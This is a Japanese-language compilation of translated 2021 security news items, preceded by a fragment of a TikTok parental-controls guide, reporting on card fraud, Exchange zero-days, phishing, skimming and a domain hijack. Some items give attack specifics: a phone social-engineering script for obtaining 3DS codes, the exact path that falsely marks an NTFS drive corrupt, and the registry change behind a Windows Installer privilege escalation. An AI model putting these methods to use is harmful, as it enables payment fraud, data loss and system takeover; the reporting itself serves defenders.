 この制限を1日30分に設定したなら、この制限に到達すると1日の残りの時間はカットオフされる。
 設定している間に、将来子供がこの設定を変更することを妨げるパスコードを選択することが可能である。
5. 子供達のアカウントにはRestricted Mode(制限モード)を使用する 
 これは、TikTokを使用する子供を持つ親にとって最も重要な設定の一つである。
 制限モードは、子供に見せるにはふさわしくないコンテンツをストップする。100%正確ではないが、かなり良い仕事をする。
 子供が後にこの設定を変更することを防ぐためにパスコードを設定することも可能である。
 この設定はまた「利用時間を管理」セクションでも発見される。
6. ファミリーセーフティーモードの利用 
 これは、あなたが少年のアカウントを‘Parent’もしくは‘Teen’に割り当て、そのTikTokアカウントにアクセスできるようにすることを可能にする重要な設定である。
 そのアカウントに接続すると、あなたは以下のことを制御できる:
・ 利用時間管理: 子供が毎日どのくらいの時間TikTokに費やせるのかを設定する。 
 これら全てを自分のデバイスから管理できので、子供を常に保護することができる。
 この設定は、デジタルウェルビーイングのファミリーセーフモード セクションにある。
ハッカーはペイメントカードの3Dセキュアをバイパスする方法を共有 
 BleepingComputer : News>Security(2021/03/03) 
 サイバー犯罪者は、オンラインカード取引認証に使用される3Dセキュア(3DS)プロトコルを回避する方法を常に模索し文書化している。
 地下フォーラムでの論議は、ソーシャル・エンジニアリングとフィッシング攻撃を結びつけることによって、最新のセキュリティ機能をバイパスする方法に関するアドバイスを提供している。
 複数のダークWebフォーラムの個人が、顧客の取引を保護するために実装されたショップで不正な購入を実行することに関する彼らの知識を共有している。
 3DSは、クレジットカードやデビットカードを使用するオンライン購入のためのセキュリティレイヤーを追加する。これは支払いを認証するためにカード所有者に直接確認を要求する。
 この機能は、銀行が取引を承認するためにコードや静的パスワードをユーザに要求した最初のバージョンから進歩している。スマホ向けに設計された二度目のバージョン(3DS 2)では、ユーザは、彼らの生体データ(指紋、顔認証)を使用するバンキング・アプリケーションで認証することによって購入を確認することができる。
 3DS 2が提供する高度なセキュリティ機能にも関わらず、最初のバージョンは、依然として広く採用されたままであり。彼らのソーシャル・エンジニアリングのスキルを使用するチャンスや、取引を承認するためのコードやパスワードを与えるようにユーザを欺くチャンスをサイバー犯罪者に与えている。
ソーシャル・エンジニアリングは3DSコードを取得する 
 本日の
ブログへの投稿 で、脅威インテリジェンス企業Gemini Advisoryは、サイバー犯罪者が3DSを実装されたオンラインストアで偽の購入を実行することに関してダークWebフォーラムで議論している方法の一部を共有した。
 これは全て、少なくとも名前、電話番号、eMailアドレス、住所、母親の旧姓、ID番号、運転免許証番号を含むカード所有者の完全な情報で始まる。
 同じ戦術は、最新の3DSで機能し、リアルタイムで購入することができる可能性がある。ハッカーは一流の地下フォーラムへの投稿でこの方法を説明している。
 カード所有者の完全な詳細、ボイスチェンジャー、電話番号なりすましアプリを使用して、詐欺師はサイトで購入を開始し、次に犠牲者に電話して必要な情報を引き出す。
 
「最終段階で、ハッカーは、最終的な本人確認用の確認コードを受け取るように犠牲者にアドバイスする。その時点で、サイバー犯罪者はその店に注文する必要がある。犠牲者の電話に送信された確認コードの入力を促されたなら、詐欺師は犠牲者からそのコードを取得する必要がある」Gemini Advisory。
 
 3DSコードを入手することは、フィッシングやインジェクションのような他の方法で可能である。犠牲者がフィッシングサイトで購入を実行すると、犯罪者は正当な店にその詳細全てを渡してその製品を取得する。
 Gemini Advisoryの発見によると、サイバー犯罪者の一部が、盗んだクレジットカードデータをPayPalアカウントに追加し、それを支払い方法として使用している。
 他の方法は古典的であり、セキュリティコードを傍受し、詐欺師にそれを渡すマルウェアで犠牲者の電話番号を侵害することを伴っている。
 あるいは多くの店舗では、取引が特定の制限を下回っている場合には3DSコードを要求しないため、詐欺師は複数の小規模な購入を持ち逃げすることができる。
 これらの手法の殆どは、以前のバージョンの3DSが存在している場合に機能する。3DS 2が広く採用されるまでには未だ長い道のりがある。ヨーロッパはより安全な標準(PSD2規制-3DS 2で満たされる強力な顧客認証)への移行を主導している一方、米国では3DS 1を使用する加盟店の不正責任保護は、2021年10月17日に期限切れになる。
 しかしながら、Gemini Advisoryは、サイバー犯罪者もソーシャルエンジニアリングを通じてより安全な3DS 2を攻撃するだろうと確信している。 
Microsoftは積極的に脆弱性攻撃されているExchangeの0-Dayのバグを今パッチした 
 BleepingComputer : News>Security(2021/03/02) 
 Microsoftは、標的型攻撃において積極的に脆弱性攻撃されている4つの0-Dayを修正したMicrosoft Exchangeの全てのバージョンをサポートする定例外のセキュリティ アップデートをリリースした。
 これら4つの0-Dayの脆弱性は、Microsoft Exchangeサーバへのアクセスを取得し、eMailを盗み、ネットワークへのアクセスを増加させるためのさらなるマルウェアを植え付けるものと結び付けられている。
 この攻撃が動作するには、リモート攻撃者は、オンプレミスのEicrosoft Exchangeサーバのポート443へのアクセスを必要とする。このアクセスが可能なら、脅威のアクターは、リモートアクセスを取得するために以下の脆弱性を活用する。
CVE-2021-26855 は、攻撃者が任意のHTTPリクエストを送信し、Exchangeサーバとして認証されることを可能にするExchange中のserver-side request forgery (SSRF、【訳注】SSRFの詳細に関してはCyber Security.comのこちらのページを参照 してください)である。
CVE-2021-26857 は、Unified Messagingサービス(【訳注】電話、 FAX 、電子メールなど異なる通信手段のメッセージをデータ化して、 サーバー 上で 一元 管理すること(コトバンクより))中の逆デジタル化の危険な脆弱性である。危険な逆デジタル化は、信頼できないユーザ制御可能なデータがプログラムによって逆デジタル化されることである。この脆弱性を悪用することで、ExchangeサーバのSYSTEMとしてコードを実行する能力をHAFNIUM(【訳注】中国政府系ハッカーグループの名前)に与える。これは、管理者パーミッションもしくは、悪用可能な他の脆弱性を要求する。
CVE-2021-26858 は、Exchangeにおける認証後の任意のファイル書き込みの脆弱性である。HAFNIUMが、Exchangeサーバに認証されると、次に彼らは、サーバ上の任意のパスにファイルを書き込むためにこの脆弱性を使用する。彼らは、CVE-2021-26855 SSRF脆弱性を悪用することによって、あるいは、正当な管理者証明書を改竄することで認証されることができる。
CVE-2021-27065 は、Exchangeにおける認証後の任意のファイル書き込みの脆弱性である。HAFNIUMが、Exchangeサーバに認証されると、次に彼らは、サーバ上の任意のパスにファイルを書き込むためにこの脆弱性を使用する。彼らは、CVE-2021-26855 SSRF脆弱性を悪用することによって、あるいは、正当な管理者証明書を改竄することで認証されることができる。
 
 Microsoftは、データを盗むために米国組織に対してこれらの攻撃を悪用しているHAFNIUMとして知られる中国政府系ハッカーグループを検出した。
 「歴史的にHAFNIUMは、主に米国企業体を攻撃しており、感染症研究者、法律事務所、高等教育機関、防衛関連契約業者、政策シンクタンク、NGO法人を含む数多くの産業から情報を盗み出すことを目的にしている」と「HAFNIUMは中国に拠点を置いているが、主に米国でリースされた仮想プライベートサーバ(VPS)から作戦は指揮されている」と、Microsoft
は本日のブログへの投稿で
明らかにしている 。
 脆弱性のあるMicrosoft Exchangeサーバへのアクセスを取得すると、HAFNIUMは、Webシェルをインストールし、データ、アップロードファイル、セキュリティ侵害されたシステム上でほぼ全てのコマンドを実行することが可能になる。
 HAFNIUMは、Webシェルを使用してキャッシュされている証明書を収穫するためにLSASS.exe実行ファイルのメモリダンプを実行する。
 彼らは、Exchangeサーバからメールボックスと盗んだデータをエクスポートし、彼らが後に取得することのできるMEGAのようなファイルシェアリングサービスに、そのデータをアップロードする。
 最後にHAFNIUMは、そのマシンと内部ネットワークにアクセスするために彼らのサーバに戻るリモートシェルを作成する。
 この攻撃の申告性に起因して、Microsoftは、これらの攻撃からExchangeサーバを保護するために、管理者は「直ちにこれらのアップデートをインストールする」ように推奨している。
 Microsoftの上級脅威情報分析官
Kevin Beaumont は、Nmap Scriptを作成した。このスクリプトは潜在的な脆弱性のあるMicrosoft Exchangeサーバのネットワークをスキャンする。
 このスクリプトを使用するには、彼のGitHubのページから
Nmap Script をダウンロードする。このファイルを/usr/share/nmap/scriptsに格納し、
nmap --script http-vuln-exchange  コマンドを使用する。
 Exchangeサーバが更新される必要があると決定したなら、サーバに現在サポートされている累積アップデートと更新プログラム・ロールアップがインストールされていることを確認する必要がある。
 管理者は、サポートされているアップデートに関する詳細情報と、パッチをインストールする方法に関しては本日公開された
Microsfot Exchangeチームの記事中 に見出すことができる。
 これらの脆弱性を使用してMicrosoft Exchangeサーバーがセキュリティ侵害されたか否かを検出するために、Microsoftは、攻撃の痕跡を確認するためにイベントログ/Exchange ServerのログをスキャンするPowerShellおよびコンソールコマンドを
提供している 。 
MicrosoftはWindows 10ドライブ損壊のバグを修正 - 知る必要のあること 
 BleepingComputer : News>Security(2021/02/27) 
 Microsoftは、単に特定のパス、もしくは特別に細工されたファイルを閲覧することでNTFSボリュームが損壊することになるWindows 10のバグを修正した。
 先月、BleepingComputerは、低い特権のユーザを含むあらゆるユーザが、NTFSボリュームをダーティーとしてマークできる
新たなWindowsのバグをレポート した。
 全てのWindowsユーザが、このバグの引き金を引くために実行する必要のあることは、以下の画像に示したように、特定のパスにアクセスすることである。
 一旦、Windowsがこのパスにアクセスしようとすると、"The file of directory is corrupted and unreadable."と宣言される。次に、このドライブは損壊しているので修復の必要があるとしてマークされる。
 Windowsは次に、コンピュータを再起動し損壊を修復するためにchkdskするように促してくる。
 Microsoftは、そのドライブは実際には損壊していない、そして、chkdskはこの問題を修正するだろうと
発言していた 。残念ながら、我々と他のテストにおいて、chkdskは、この問題を修正することはなく、Windows 10は再起動することを拒否した。
【訳者より】動画に関しては、
こちらのサイト中程 にあります
MicrosoftはNTFS損壊のバグを修正 
 このバグが公開されて以来、Microsoftが
2月の定例パッチ の一部として修正をリリースするのではないかという期待があった。
 この期待が裏切られたので、Mozilla Firefox 85.0.1は、このパスへのアクセスを妨げるための
チェックを追加した し、OSRは、Windows中にこのパスをブロックするための
非公式のパッチをリリース した。
 今週のWindows 10 Insider build 21322のリリースで、Microsoftは、このパスへのアクセスを妨げるundocumentedの修正を含めている。
 これで、あなたが、c:\:Si30:$bitmapにアクセスしようとすると、Windows 10は以下に示すように"The directory name is invalid,"を戻してくるので、最早NTFSボリュームを損壊としてマークすることはない。
 残念ながら、この修正はWindows 10 Insider 'Dev'チャンネルにのみ存在しており、
Windows 10 21H1  'Beta'プレビュー(この春にリリースされる次の機能アップデート)には存在していない。
 Microsoftが、より早くリリースされるWindowsバージョンにこの修正を引き上げた場合を除き、しばらくの間、このバグで立ち往生することになるだろう。 
大手認証企業Underwriters Laboratoriesが身代金要求型マルウェアによって攻撃された 
 BleepingComputer : News>Security(2021/02/21) 
 Underwriters Laboratoriesとして知られる UL LLCは、身代金要求型マルウェアの攻撃を受けサーバーが暗号化された。そして、修復期間中システムのシャットダウンが発生していた。
 ULは、米国最大で最古の安全性承認企業であり、14,000人の従業員と40を超える国々に事務所を持っている。
 今までに電気機器(ラップトップ、TVのリモコン、白熱電球、AppleのUSB充電器)の背面に注目したことがあるのなら、そのデバイスに印刷されたULのロゴを即座に認識できたはずである。
 企業が新しい製品をリリースする時、その企業は一般的に、全国的に認証される安全性と持続性の基準に基づいてテストされ認証されるためにULに製品を提出する。テストがどのように実施されたのかと、その結果に基づいて、その製品は、多様なUL証明書を受け取る。
 製品の安全性証明書に加えて、ULは、大変人気のある 
3DMark , 
PCMark , 
VRMark や、PCとグラフィックス ベンチマーク ユーティリティもまた開発している。
ULは先週末、身代金要求型マルウェアに攻撃された 
 BleepingComputerは、先週末身代金要求型マルウェア攻撃を受け、彼らのデータセンター中のデバイスを暗号化されたことを認識した。
 攻撃のさらなる拡大を防ぐために、この企業はシステムをシャットダウンしたので、従業員の一部は仕事をすることができなくなった。
 ULは、この脅威のアクターに接触しないように、この身代金要求型マルウェア オペレーションに関連する如何なるサイトも訪問しないように従業員に命じた。
 この攻撃に精通している情報筋によると、ULは身代金を支払わずに、バックアップから復元することを決定した。
 デバイスの復元には時間がかかるので、この攻撃は、ULが復元している間myULクライアントポータルをオフラインのままにせしめた。
 BleepingComputerへの声明において、ULは、この攻撃が2月13日に発生したことと、現在攻撃を調査中であることを認めている。
「ULは、2021年2月13日にシステム上に異常な挙動を検出した。即座にこの状況を解決するための予防策を取った。これには、システムのシャットダウン、大手サイバーセキュリティ企業との協力、所轄官庁への通報が含まれる。我々の当面の優先事項は、顧客への影響を最小限に抑えるために、システムを復元することである。」
 「我々は調査から詳細を認識するまで、影響を受けた可能性のある情報の種類を推測できない。影響を受けたデータが判明次第、適切なアクションを取る。」 - UL LCC
 
 どの身代金要求型マルウェア オペレーションがこの攻撃を指揮したのか、攻撃者は暗号化されていないファイルを盗んだのか否かは判明していない。
 大部分の企業をターゲットにした身代金要求型マルウェア オペレーションは、二重強請作戦を使用するために暗号化されていないファイルを盗むので、ギャングは、おそらくこの攻撃の間にデータを盗んでいるだろう。
ハッカーはCSPをバイパスしクレジットカードを盗むためにGoogleのApps Scriptを悪用している 
 BleepingComputer : News>Security(2021/02/18) 
 攻撃者は、オンラインショッピングをしている間に、eコマースWebサイトの顧客によって提出されたクレジットカード情報を盗むために、GoogleのApps Script商用アプリケーション開発プラットフォームを悪用している。
 彼らは、script.google.comドメインを使用することで、マルウェアスキャンエンジンから彼らの悪意ある行為を上手く隠蔽し、Content Security Policy (CSP、【訳注】コンテンツセキュリティポリシーとは、クロスサイトスクリプティング (XSS) やデータインジェクション攻撃などのような、特定の種類の攻撃を検知し、影響を軽減するために追加できるセキュリティレイヤーのこと(MDN Web Docsより)) をバイパスしている。
 犯罪者は、オンラインストアがGoogleのApps ScriptドメインをTrustとして考えており、オンラインストア サイトの
CSP 設定(Webアプリでの信頼できないコードの実行をブロックするためのセキュリティ標準)が、Googleの全てのサブドメインをホワイトリストに登録している可能性があるという事実を悪用している。
 クレジットカードスキマーは(Magecartスクリプトやペイメントカードスキマー)は、サイバー犯罪者のグループ(
Magecartグループ として知られる)によって挿入されるJavaScriptベースのスクリプトであり、Webスキミング(eスキミングとしても知られている)攻撃の一部としてハッキングされたオンラインストアに挿入される。
 一旦配備されると、このスクリプトは攻撃者が支払いとハッキングされているショップの顧客によって提出された個人情報を収穫し、彼らの制御下にあるサーバにそれを収集することを可能にする。
Google Apps Scriptドメインは、抽出エンドポイントとして使用された 
 この新しい支払い情報を盗む戦略は、デジタルスキミングとの戦いに重点的に取り組んでいるセキュリティ企業
Sansec によって提供されたEarly Breach Detectionデータを解析している間に、セキュリティ研究者
Eric Brandel によって発見された。
 彼が発見した時、悪意のある難読化されたスキマースクリプトは、攻撃者によってユーザが提出した支払い情報を横取りするためのeコマースサイトに挿入されていた。
 セキュリティ侵害されたオンラインショップから盗まれた全ての支払い情報は、base64でエンコードされたJSONデータとしてGoogle Apps Scriptカスタム アプリケーションに送信される(抽出エンドポイントとしてscript[.]google[.]comを使用して)。
 Google Apps Scriptのエンドポイントに到達した後、このデータは攻撃者によって制御されている他のサーバ(イスラエルに本拠を置くanalit[.]tech)に転送される。
 「このマルウェアドメインanalit[.]techは、
以前発見された マルウェアドメインhotjar[.]hostとpixelm[.]techと同日に登録されており、同じネットワー上にもホストされている」と、Sansecは
発言 している。
 これは、このGoogleサービスが悪用された初回ではない。過去に
FIN7サイバー犯罪者グループ によって、
マルウェアのコマンドアンドコントロールサーバ用にGoogle SheetsとGoogle Formsサービスとが一緒に使用されている。
 2015年の半ば以降、FIN7 (別名Carbanak あるいは Cobalt) は、
Carbanak バックドアを使用して銀行とEUと米国企業のPoint of Sale(【訳注】 店舗販売時点情報管理)端末をターゲットにした。
 「この新しい脅威は、信頼できないドメインとの通信からWebストアを単に保護するだけでは不十分であることを示している」と、「eコマースのマネージャは、そもそも攻撃者が認証されていないコードを挿入できないことを保証する必要がある。サーバーサイドマルウェアと脆弱性をモニタリングすることは、あらゆる現代のセキュリティポリシーで必須のものである」と、Sensecは付け加えている。
Google Analyticsもまた、クレジットカードを盗むために悪用されていた 
 他のGoogleサービスもまた、Magecart攻撃に悪用されていた。
Google Analyticsプラットフォームも攻撃者によって使用され 、数十ダースのオンラインストアから支払い情報が盗まれていた。
 これらの攻撃を更に悪化させているのは、Google Analytics APIを悪用することによって、Webストアが、訪問者を追跡するために、CSP設定でGoogleのWeb Analyticsサービスがホワイトリストに登録されていることを確認し、脅威のアクターがCSPを回避する可能性があることである。
 当時、SansecとPerimeterXが発見したように、インジェクションベースの攻撃をブロックする代わりに、Google Analyticsスクリプトを許可することは、攻撃者がそれらを活用しデータを盗み抽出することを可能にした。
 これは、盗んだデータをエンコードし、暗号化された形式で攻撃者のGoogle Analyticsダッシュボードに、それを送信するように特別に設計されたWebスキマースクリプトを使用して実行される。
 
BuiltWith によって提供された統計に基づくと、現在2800万を超えるサイトがGoogleのGA(Google Analyticsの略) Web Analyticsサービスを使用している。PerimeterXの統計によると、2020年3月にHTTPArchiveスキャンを介して到達可能な17,000のWebサイトが、google-analytics.comドメインをホワイトリストに登録している。
 「一般的に、デジタルスキマー(別名Magecart)は、タックス・ヘイブンにある危険なサーバーで実行され、その場所は、極悪な意図を顕にしている」と、当時Sansecは説明していた。
 「しかし、スキミングキャンペーンが全体的に信頼されているGoogleサーバで実行されると、殆どのセキュリティシステムは『不審なドメイン』('suspicious')とするフラグをたてることはない。より重要なのは、サイトの管理者がGoogleを信頼すると、Content-Security-Policy (CSP) のような人気のある対抗策が機能しなくなることにある」
 「CSPは信頼できないコードの実行を制限するために発明された。しかし、殆ど全ての人がGoogleを信頼しているので、このモデルは欠陥がある」と、SansecのCEOで設立者である
Willem de Groot はBleepingComputerに話した。
Microsoft、Windows 10のWiFiクラッシュを修正する緊急の定例外アップデートをリリース 
 BleepingComputer : News>Security(2021/02/11) 
 Microsoftは、WPA3 WiFiネットワークに接続する時、Windows 10がクラッシュを発生するバグに関する緊急の定例外アップデート(KB5001028)をリリースした。
 MicrosoftのWindows Message Centerに投稿された新しいサポートによると、このバグは、最近のWindows 10 1909累積アップデート(特に、2021年01月21日にリリースされたKB4598298と、先週の火曜日(2021年02月09日)にリリースされたKB4601315)で導入された。
 このバグは、WPA3 WiFiネットワークに接続しようとした時に、デバイスにBlue Screen of Death (BSOD、死のブルースクリーン)を発生させる。WPA3は、現時点で強力なセキュリティを持っているので推奨されているワイアレス暗号化プロトコルである。
 Microsoftが本日公開したことによると、「あなたが、Wi-Fi Protected Access 3 (WPA3)に接続しようとした時、ブルースクリーンと共にnwifi.sysに0x7Eストップ エラーを受け取っている場合がある」と、「切断したり、スリープやハイバーネーションから復帰しWiFiネットワークに再接続しようとした時この問題に遭遇するだろう。殆どのWiFiネットワークは現在WPA2を使用している、そして、WPA2はこの問題の影響を受けないことに注意しなさい」とある。
 定例外アップデートに加えて、Microsoftは、以下の軽減するためのステップも提供している。これは特定のユーザにとっては望ましいものではない可能性がある。
・ デバイスをWindows 10, version 2004または、Windows 10, version 20H2にアップデートする 
 定例外アップデートKB5001028は現在、Windows Update, WSUS, 
Microsoft Updateカタログ を介して利用可能になっている。
ダークサイドに結びついているAndroidアプリケーションは数百万ユーザに対してマルウェアアップデートを送信していた 
 BleepingComputer : News>Security(2021/02/08) 
 Googleは、Play Storeから1000万を超えてインストールされている人気あるAndroid barcode scanner(バーコードスキャナ)を削除した。これに先立って、研究者は、2020年12月のアップデートで悪意あるものに変換されたことを発見していた。
 数年間の休眠の後、LAVABIRD LTDによって開発され以前は正当なものであった
Barcode Scanner アプリケーションは、セルフアップデートされ、現在セキュリティベンダによってトロイの木馬とタグ付けされている悪意あるコードを使用してユーザのデバイスを乗っ取っている。
 数百万のユーザによって経験された悪意ある挙動は、ユーザと何ら対話することなくDefaultブラウザを起動したり、他の潜在的に悪意のあるAndroidアプリケーションを宣伝する広告を表示したりすることが含まれている。
 「所有者の多くは、長期間彼らのモバイルデバイスにこのアプリケーションをインストールしていた(あるユーザは数年間インストールしていた)」と、「前触れもなく、12月のアップデートの後、Barcode Scannerは、無害なスキャナから完全に悪意ある物に変わった」と、Malwarebytesのマルウェア研究者Nathan Collierは
発言 している。
 これは、悪意あるコードがAndroidアプリケーション中で発見された初めてのことではないが、このような事案は通常、収益を上げるために広告を表示するフリーのアプリケーションによって使用されるサードパーティのソフトウェア開発キット(SDK)の使用に関係している。
 しかし、今回の場合、難読化と署名された悪意あるコードはアプリケーションに同梱され、1000万ユーザを超えるデバイスに一挙にインストールされている。
 「これが同じアプリケーションの開発者からのものであるか否かを検証すると、以前のクリーンなバージョンと同じデジタル証明書でサインされていることが確認された」、更に、「Android/Trojan.HiddenAds.AdQRを検出したので、その悪意の目的のために、我々はアドウェアのオリジナルの検出カテゴリを越えてトロイの木馬に直接ジャンプした」と、Collierは追加している。
 Googleは、12月のMalwarebytesの発表を受け取った後、Play StoreからLAVABIRDのBarcode Scannerアプリケーションを削除した。
 それであるにも拘わらず、依然として影響を受けたまま、知らないうちにユーザベースに不要な広告を表示されている数百万のデバイスが存在している可能性がある。
 LAVABIRDのスポークスマンは、BleepingComputerは本日早朝コメントを求めて接触したが即座の回答は得られていない。
新しいフィッシング攻撃は悪意あるURLを非表示にするためにモールスコードを使用している 
 BleepingComputer : News>Security(2021/02/07) 
 新しいターゲット フィッシングキャンペーンは、eMail添付ファイル中の悪意あるURLを非表示にするために、新奇な難読化テクニックであるモールスコードを使用している。
 Samuel MorseとAlfred Vailは、電信でメッセージを送信する方法としてモールスコードを発明した。モールスコードを使用すると、各文字と数字は、一連のドット(短点)とダッシュ(長点)で暗号化される。
 先週始め、脅威のアクターは、モールスコードを悪用し、電子メールセキュリティとメールフィルタをバイパスするために、フィッシング フォーム中の悪意あるURLを非表示にすることを始めた。
 BleepingComputerは、過去のフィッシング攻撃中に、この新奇な難読化テクニックであるモールスコードへの参照を見つけることができなかった。
新奇なモールスコード フィッシング攻撃 
 Reddit の投稿でこの攻撃を最初に認識した後、BleepingComputerは、2021年02月02日以降VirusTotalにアップロードされたこのターゲット攻撃に関する多くのサンブルを発見することができた。
 このフィッシング攻撃は、'Revenue_payment_invoice February_Wednesday 02/03/2021'のような件名で企業の請求書を装うeMailで開始される。
 このeMailは、企業のExcel請求書であるかのように名付けられたHTML添付ファイルを含んでいる。これらの添付ファイルは、'[company_name]_invoice_[number]._xlsx.hTML'の形式で名付けられている。
 例えば、BleepingComputerが騙られている場合であれば、添付ファイルは、'bleepingcomputer_invoice_1308._xlsx.hTML'と名付けられるだろう。
 この添付ファイルをテキストエディタで表示すると、このメールには文字と数字をモールスコードにマップするJavaScriptを含んでいることが分かる。例えば、以下に示すように、文字'a'は'.-'にマップされ、文字'b'は'-...'にマップされる。
 このスクリプトは次に、モールスコード文字列を16進数文字列に復号するためにdecodeMorse()関数をコールする。この16進数文字列は更にHTMLページに挿入されるJavaScriptタグに復号される。
 HTML添付ファイルとこの挿入されるスクリプトの組み合わせは、インチキのExcelスプレッドシートを表示し、サインインがタイムアウトしたと主張してパスワードの再入力を促すために必要な様々なリソースを含んでいる。
 ユーザがパスワードを入力すると、このフォームは攻撃者がログイン認証を収集しているリモートサイトに、このパスワードを送信する。
 このキャンペーンは大変標的型である。脅威のアクターは説得力を高めるためにlogo.clearbit.com(【訳注】簡単にプロジェクトに企業のロゴを埋め込むことができるツール(Clearbitより))サービスを使用して、騙られている企業のロゴを挿入している。企業のロゴを使用できない場合は、上の画像に示したように一般的なOffice365のロゴを使用している。
 BleepingComputerは、このフィッシング攻撃のターゲットにされた11の企業(SGS, Dimensional, Metrohm, SBI (Mauritius) Ltd, NUOVO IMAIE, Bridgestone, Cargeas, ODDO BHF Asset Management, Dea Capital, Equinti, Capital Four)を確認した。
 メールゲートウェイが悪意あるeMailをより良く検出するようになっているので、フィッシング詐欺は、日々より複雑化してきている。
 これに起因して、全ての人々は、いかなる情報も送信する前にURLと添付ファイルの名前に細心の注意を払う必要がある。何か疑わしいのであれば、受信者は更に調査するためにネットワーク管理者にコンタクトする必要がある。
 今回のフィッシングeMailは、添付ファイルに二重拡張子(xlxsとHTML)を使用しているので、
Windowsファイル拡張子が有効になっていることの確認 は、疑わしい添付ファイルを見つけやすくするので重要なことである。
Fonix身代金要求型マルウェアがオペレーションを終了。マスター復号キーをリリース(概要) 
 BleepingComputer : News>Security(2021/01/29) 
 Fonix身代金要求型マルウェアのギャングが、本日の午後(米国時間)オペレーションの終了をTwitter上で表明した。但し、メンバーの一部にオペレーションの終了に反対した者がいたことも明らかにしている。
 別のTweetで、'Fonix_decrypter.rar'と名付けられたRARアーカイブへのリンクが共有されている。このアーカイブは復号ツールとマスター秘密復号鍵の両方を含んでいる。
 今夜リリースされた復号ツールは、犠牲者の幾つかのファイルを無料で復号してみせるためのツールであり、犠牲者がコンピューター全体を復号することはできない。
 マスターキーの方は、Fonix身代金要求型マルウェアの一部のバージョンでだけ動作する。
 Emsisoftの復号プログラムは、.Fonix, .FONIX, .repter, .XINOF拡張子を含む全てのバージョンを復号する。
 現在、暗号化トラフィック分析(ETA)がなされていない。あなたが犠牲者であれば、解決策はもう直リリースされるだろう。
Windowsインストーラの0-Dayの脆弱性にフリーのマイクロパッチがリリースされた 
 BleepingComputer : News>Security(2021/01/29) 
 Windowsインストーラ コンポーネント中の脆弱性は、Microsoftが数回修正を企てたものの役に立たなかったが、本日、セキュリティ侵害されたシステム上で最高の特権を取得するオプションをハッカーに取得させないようにするマイクロパッチを受け取った。
 この問題はWindows 7から10に影響する。この問題を解決しようとするMicrosoftの
最も最近の努力 は10月だった。2020年12月下旬に、概念の実証(PoC)エクスプロイト コードを備えたバイパスが登場した。
パッチ、バイパス、繰り返し 
 MSIパッケージのインストール中、Windowsインストーラは、その過程で上手く行かなかった場合、あらゆる変更を元に戻すために‘msiexec.exe’を介してロールバックスクリプトを作成する。
 ローカル特権のハッカーは、ロールバックスクリプトを彼らのペイロードに差し向けるようにレジストリ値を変更したものに置き換えることができたなら、SYSTEMパーミッションで実行可能ファイルを稼働することができる。
 この脆弱性は、Microsoftの探査網に現れ、
2019年4月 (CVE-2019-0841)に修正がなされた。脆弱性研究者
Sandbox Escaper は、5月末にバイパスできることを発見し、技術的詳細の一部を公開した。
 このストーリは4回も繰り返された(
CVE-2019-1415 , 
CVE-2020-1302 , 
CVE-2020-0814 , 
CVE-2020-16902 )。そして、依然としてWindowsインストーラは、セキュリティ侵害されたマシンで最高のパーミッションを取得できる特権の昇格のための攻撃が可能である。
 最新のバイパスは、セキュリティ研究者Abdelhamid Naceriによって、
複数のセキュリティソフトに影響を与える脆弱性 と共に彼のブログで公開された。
一時的な修正が利用可能に 
 Mitja Kolsek(ACROS SecurityのCEで、マイクロパッチサービス0patchの共同設立者)は、Naceri’s PoCがこの脆弱性に関してどのような作業をしたのか説明している。
「この概念の実証は、HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Fax\ImagePath を  c:\Windows\temp\asmae.exe に値を変更したロールバックスクリプトを使用している。このサービスが起動すると、攻撃者のasmae.exeを使用したFax Service(【訳注】 Outlook、Word、Excel、PowerPoint のファイルをインターネットFAXとして送信できるMicrosoft Officeの機能(Microsoftサポートより))という結果になる。このサービスは、あらゆるユーザが、それを起動することを可能にするために使用される。そして、これはローカルシステムで実行される」- Mitja Kolsek
 
 Microsoftの永続的なパッチが出現するまで、この一時的な修正が、0Patchプラットフォームから利用可能である。この一時的な修正は、システム再起動を伴わない単一命令の修正である。
 このビデオ(
リンク )は、ローカルの非管理者ユーザによるFaxService実行ファイルに差し向け、攻撃者のコードを実行するレジストリ値の改竄を、このマイクロパッチが妨げていることを示している。
 0Patchからのフリーで一時的な修正は、以下のシステムで動作する。
・   Windows 10 v20H2, 32/64bit, updated with January 2021 updates 
Perlドメインが盗まれ、現在マルウェアに結び付けられたIPアドレスが使用されている 
 BleepingComputer : News>Security(2021/01/29) 
 ドメイン名Perl.comが今週盗まれ、現在マルウェアキャンペーンに関連付けられたIPアドレスに振り向けられれている
 Perl.comは、Perl Foundationによって所有されているサイトであり、1997年以来、Perlプログラミング言語に関するニュースと記事を投稿するために使用されてきた。
 1月27日、Perl NOC(the perl.org infrastructure weblog!)サイトに、perl.comドメインがハイジャックされ、現在ユーザは別のIPアドレスに振り向けられていると投稿された。
 「perl.comドメインは、今朝ハイジャックされ、現在ユーザは構築中のサイトに振り向けられている。修復に向けて作業中」と、
Perl.orgはポスト している。
 本来のperl.comサイトのIPアドレスは、151.101.2.132であったが、ハイジャックされて以来、現在Google Cloud IPアドレス  35.186.238[.]101 にホストされている。
 サイトを訪問した時、ユーザはブランク ページで迎えられる。このページのHTMLは、このドメインがレジストラkey-systems(.)netに登録されている場合でさえ、GoDaddy(【訳注】 米国 スコッツデールに本社を置くドメイン レジストラ・レンタルサーバ サービス(Wikipediaより))パークドメイン(【訳注】 機能していないサイトを指し示すドメイン。多くの場合、訪問者にドメインが構築中であるか、広告でいっぱいのページであることを知らせるページが表示される(EsDifferent.comより))スクリプトを含んでいる。
 Perl言語の開発者brian d foyは、ドメインが修復されるまで、このサイトにアクセスしたいユーザのために、彼らが一時的にperl.comを
http://perldotcom.perl.org にセットアップしていたと
Tweet している。
 ハイジャックされたドメインが修復されるまで、Perl Foundationは、CPAN(【訳注】 Perlのライブラリ・モジュールやその他のPerlで書かれたソフトウェアを集めた巨大なアーカイブ(Wikipediaより))ミラーとして、以下のコマンドを使用して、それをアップデートするためにperl.comを使用ないようにユーザに、要請している。
# perl -MCPAN -eshell
cpan[1]> o conf urllist http://www.cpan.org/ 
 現時点で、ドメインが盗まれた方法は未知である。BleepingComputerは、Perl Foundationにこの件に関する質問状を送付したが、回答は受け取っていない。
マルウェアに結び付けられた新しいperl.comのIP 
 perl.comが現在ホストしているIPアドレスは、古いマルウェアキャンペーンとより新しいマルウェアキャンペーンとで使用されてきた長い歴史を持っている。
 2019年、IPアドレス 35.186.238[.]101 は、現在は消滅している
Locky身代金要求型マルウェア の実行ファイル(
VirusTotal )を配布するためのドメインに結び付けられていた。
 より最近では、ad clickerのように見えるマルウェア(
VirusTotal )が、コマンドアンドコントロールサーバとして以下のドメインを使用していた。
